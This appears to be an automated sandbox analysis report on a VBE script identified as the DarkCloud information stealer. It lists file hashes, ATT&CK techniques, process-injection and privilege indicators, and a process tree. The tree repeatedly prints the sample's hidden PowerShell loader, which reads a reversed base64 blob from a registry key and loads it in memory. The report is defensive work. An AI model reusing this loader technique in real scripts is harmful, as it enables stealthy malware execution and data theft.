darkcloud | 2bfd3a4cf58b0bc16b1af17eba113dbd58d00d7b199634d08428126f79e2bf9c

Analysis

max time kernel
598s
max time network
438s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
11/03/2025, 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ovQc.vbe
Size

10KB
MD5

ba104bdc908f978aaa1c4bdc39a3553a
SHA1

b1d0111c23c09f659fc9993ff5d1304c06ed5ba1
SHA256

2bfd3a4cf58b0bc16b1af17eba113dbd58d00d7b199634d08428126f79e2bf9c
SHA512

236b6666b7a3a994f519c6ba2f77a358c23d430d34300dbf2c948b121199f3094b7ce3a3060b32d46dd2d272b610fb5c1621530f7917fb775195594c3ef82b9b
SSDEEP

96:Lh31q9lqKylGu47UgHw63nw7ZAy6e3GowTC0qaXSZM6fiEoqDzG3gYBl/U4QlI+K:Lh1q9lqKy8wcnsay6eoeAaMZqfOHTSdK

Score

10^/10

darkcloud execution stealer

Malware Config

Signatures

DarkCloud
An information stealer written in Visual Basic.
stealer darkcloud
Darkcloud family
darkcloud

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	1492	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 57 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1216	powershell.exe
3748	powershell.exe
2624	powershell.exe
3760	powershell.exe
2296	powershell.exe
1352	powershell.exe
1720	powershell.exe
4844	powershell.exe
5196	powershell.exe
5608	powershell.exe
6032	powershell.exe
2752	powershell.exe
5188	powershell.exe
4632	powershell.exe
4416	powershell.exe
2056	powershell.exe
5384	powershell.exe
4092	powershell.exe
4524	powershell.exe
6064	powershell.exe
1820	powershell.exe
4596	powershell.exe
2472	powershell.exe
3800	powershell.exe
4612	powershell.exe
2396	powershell.exe
3604	powershell.exe
5796	powershell.exe
2164	powershell.exe
2676	powershell.exe
5028	powershell.exe
4908	powershell.exe
5000	powershell.exe
5212	powershell.exe
3688	powershell.exe
6020	powershell.exe
5648	powershell.exe
2248	powershell.exe
2320	powershell.exe
852	powershell.exe
4508	powershell.exe
6052	powershell.exe
4336	powershell.exe
2788	powershell.exe
5060	powershell.exe
4528	powershell.exe
5712	powershell.exe
3108	powershell.exe
3308	powershell.exe
5404	powershell.exe
5820	powershell.exe
2380	powershell.exe
5316	powershell.exe
5400	powershell.exe
5776	powershell.exe
1316	powershell.exe
5888	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation	WScript.exe

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

Suspicious use of SetThreadContext 32 IoCs

description	pid	Process	procid_target
PID 4416 set thread context of 2984	4416	powershell.exe	96
PID 4336 set thread context of 952	4336	powershell.exe	118
PID 4524 set thread context of 3176	4524	powershell.exe	121
PID 2164 set thread context of 4428	2164	powershell.exe	125
PID 2320 set thread context of 4556	2320	powershell.exe	128
PID 2676 set thread context of 3528	2676	powershell.exe	131
PID 2296 set thread context of 1312	2296	powershell.exe	134
PID 2752 set thread context of 4968	2752	powershell.exe	137
PID 4596 set thread context of 3916	4596	powershell.exe	140
PID 1352 set thread context of 2592	1352	powershell.exe	143
PID 1720 set thread context of 456	1720	powershell.exe	146
PID 3760 set thread context of 4420	3760	powershell.exe	149
PID 2788 set thread context of 3552	2788	powershell.exe	152
PID 5028 set thread context of 2368	5028	powershell.exe	155
PID 3308 set thread context of 2184	3308	powershell.exe	158
PID 4908 set thread context of 3152	4908	powershell.exe	161
PID 852 set thread context of 3088	852	powershell.exe	164
PID 2472 set thread context of 5052	2472	powershell.exe	167
PID 3688 set thread context of 3140	3688	powershell.exe	170
PID 5060 set thread context of 1396	5060	powershell.exe	173
PID 3748 set thread context of 3540	3748	powershell.exe	176
PID 4528 set thread context of 1792	4528	powershell.exe	179
PID 4844 set thread context of 2620	4844	powershell.exe	182
PID 5196 set thread context of 5356	5196	powershell.exe	185
PID 5404 set thread context of 5556	5404	powershell.exe	188
PID 5608 set thread context of 5760	5608	powershell.exe	191
PID 5820 set thread context of 5968	5820	powershell.exe	194
PID 6020 set thread context of 5140	6020	powershell.exe	197
PID 5000 set thread context of 5312	5000	powershell.exe	200
PID 2624 set thread context of 1916	2624	powershell.exe	203
PID 5776 set thread context of 5996	5776	powershell.exe	206
PID 6032 set thread context of 5164	6032	powershell.exe	209

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4416	powershell.exe
4416	powershell.exe
4336	powershell.exe
4336	powershell.exe
4336	powershell.exe
4524	powershell.exe
4524	powershell.exe
4524	powershell.exe
2164	powershell.exe
2164	powershell.exe
2164	powershell.exe
2320	powershell.exe
2320	powershell.exe
2320	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
2296	powershell.exe
2296	powershell.exe
2296	powershell.exe
2752	powershell.exe
2752	powershell.exe
2752	powershell.exe
4596	powershell.exe
4596	powershell.exe
4596	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1720	powershell.exe
1720	powershell.exe
1720	powershell.exe
3760	powershell.exe
3760	powershell.exe
3760	powershell.exe
2788	powershell.exe
2788	powershell.exe
2788	powershell.exe
5028	powershell.exe
5028	powershell.exe
5028	powershell.exe
3308	powershell.exe
3308	powershell.exe
3308	powershell.exe
4908	powershell.exe
4908	powershell.exe
4908	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
2472	powershell.exe
2472	powershell.exe
2472	powershell.exe
3688	powershell.exe
3688	powershell.exe
3688	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
3748	powershell.exe
3748	powershell.exe
3748	powershell.exe
4528	powershell.exe
4528	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3948	WScript.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	3760	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	4908	powershell.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	3748	powershell.exe
Token: SeDebugPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	5196	powershell.exe
Token: SeDebugPrivilege	5404	powershell.exe
Token: SeDebugPrivilege	5608	powershell.exe
Token: SeDebugPrivilege	5820	powershell.exe
Token: SeDebugPrivilege	6020	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	5776	powershell.exe
Token: SeDebugPrivilege	6032	powershell.exe
Token: SeDebugPrivilege	3604	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1492 wrote to memory of 4416	1492	WScript.exe	90
PID 1492 wrote to memory of 4416	1492	WScript.exe	90
PID 4416 wrote to memory of 2984	4416	powershell.exe	96
PID 4416 wrote to memory of 2984	4416	powershell.exe	96
PID 4416 wrote to memory of 2984	4416	powershell.exe	96
PID 4416 wrote to memory of 2984	4416	powershell.exe	96
PID 4416 wrote to memory of 2984	4416	powershell.exe	96
PID 4416 wrote to memory of 2984	4416	powershell.exe	96
PID 4416 wrote to memory of 2984	4416	powershell.exe	96
PID 4416 wrote to memory of 2984	4416	powershell.exe	96
PID 3948 wrote to memory of 1216	3948	WScript.exe	113
PID 3948 wrote to memory of 1216	3948	WScript.exe	113
PID 3948 wrote to memory of 4336	3948	WScript.exe	116
PID 3948 wrote to memory of 4336	3948	WScript.exe	116
PID 4336 wrote to memory of 952	4336	powershell.exe	118
PID 4336 wrote to memory of 952	4336	powershell.exe	118
PID 4336 wrote to memory of 952	4336	powershell.exe	118
PID 4336 wrote to memory of 952	4336	powershell.exe	118
PID 4336 wrote to memory of 952	4336	powershell.exe	118
PID 4336 wrote to memory of 952	4336	powershell.exe	118
PID 4336 wrote to memory of 952	4336	powershell.exe	118
PID 4336 wrote to memory of 952	4336	powershell.exe	118
PID 3948 wrote to memory of 4524	3948	WScript.exe	119
PID 3948 wrote to memory of 4524	3948	WScript.exe	119
PID 4524 wrote to memory of 3176	4524	powershell.exe	121
PID 4524 wrote to memory of 3176	4524	powershell.exe	121
PID 4524 wrote to memory of 3176	4524	powershell.exe	121
PID 4524 wrote to memory of 3176	4524	powershell.exe	121
PID 4524 wrote to memory of 3176	4524	powershell.exe	121
PID 4524 wrote to memory of 3176	4524	powershell.exe	121
PID 4524 wrote to memory of 3176	4524	powershell.exe	121
PID 4524 wrote to memory of 3176	4524	powershell.exe	121
PID 3948 wrote to memory of 2164	3948	WScript.exe	123
PID 3948 wrote to memory of 2164	3948	WScript.exe	123
PID 2164 wrote to memory of 4428	2164	powershell.exe	125
PID 2164 wrote to memory of 4428	2164	powershell.exe	125
PID 2164 wrote to memory of 4428	2164	powershell.exe	125
PID 2164 wrote to memory of 4428	2164	powershell.exe	125
PID 2164 wrote to memory of 4428	2164	powershell.exe	125
PID 2164 wrote to memory of 4428	2164	powershell.exe	125
PID 2164 wrote to memory of 4428	2164	powershell.exe	125
PID 2164 wrote to memory of 4428	2164	powershell.exe	125
PID 3948 wrote to memory of 2320	3948	WScript.exe	126
PID 3948 wrote to memory of 2320	3948	WScript.exe	126
PID 2320 wrote to memory of 4556	2320	powershell.exe	128
PID 2320 wrote to memory of 4556	2320	powershell.exe	128
PID 2320 wrote to memory of 4556	2320	powershell.exe	128
PID 2320 wrote to memory of 4556	2320	powershell.exe	128
PID 2320 wrote to memory of 4556	2320	powershell.exe	128
PID 2320 wrote to memory of 4556	2320	powershell.exe	128
PID 2320 wrote to memory of 4556	2320	powershell.exe	128
PID 2320 wrote to memory of 4556	2320	powershell.exe	128
PID 3948 wrote to memory of 2676	3948	WScript.exe	129
PID 3948 wrote to memory of 2676	3948	WScript.exe	129
PID 2676 wrote to memory of 3528	2676	powershell.exe	131
PID 2676 wrote to memory of 3528	2676	powershell.exe	131
PID 2676 wrote to memory of 3528	2676	powershell.exe	131
PID 2676 wrote to memory of 3528	2676	powershell.exe	131
PID 2676 wrote to memory of 3528	2676	powershell.exe	131
PID 2676 wrote to memory of 3528	2676	powershell.exe	131
PID 2676 wrote to memory of 3528	2676	powershell.exe	131
PID 2676 wrote to memory of 3528	2676	powershell.exe	131
PID 3948 wrote to memory of 2296	3948	WScript.exe	132
PID 3948 wrote to memory of 2296	3948	WScript.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ovQc.vbe"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4416
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:2984

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ifGtcQfISxddcGn.vbs"
1⤵
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1216
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:4260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4524
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:4428
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2320
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:4556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:1312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:4968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4596
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1352
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:2592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1720
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3760
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:4420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2788
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5028
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:2368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3308
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:2184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4908
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2472
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:5052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3688
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5060
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:1396
